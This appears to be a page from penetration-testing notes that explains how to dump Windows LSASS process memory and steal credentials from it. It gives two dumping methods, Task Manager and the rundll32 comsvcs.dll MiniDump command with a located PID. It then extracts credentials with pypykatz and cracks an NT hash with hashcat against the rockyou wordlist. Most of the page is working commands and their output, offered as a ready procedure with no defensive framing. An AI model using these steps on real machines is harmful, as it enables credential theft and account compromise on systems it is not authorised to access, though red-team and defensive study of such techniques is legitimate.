LSASS

Dumping LSASS

1. Task Manager Method

Open Task Manager > Select the Processes tab > Find & right click the Local Security Authority Process > Select Create dump file

C:\Users\loggedonusersdirectory\AppData\Local\Temp\lsass.DMP

2. Rundll32.exe and Comsvcs.dll Method

Finding LSASS PID

C:\Windows\system32> tasklist /svc

Image Name                     PID Services
========================= ======== ============================================
lsass.exe                      672 KeyIso, SamSs, VaultSvc

PS C:\Windows\system32> Get-Process lsass

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
   1260      21     4948      15396       2.56    672   0 lsass

Creating lsass.dmp

PS C:\Windows\system32> rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full

Using pypykatz to extract credential

Running pypykatz

$ pypykatz lsa minidump /home/peter/Documents/lsass.dmp

Cracking the NT hash with hashcat

$ sudo hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt

PreviousSAM/LSA NextActive Directory and NTDS.dit

Last updated 2 years ago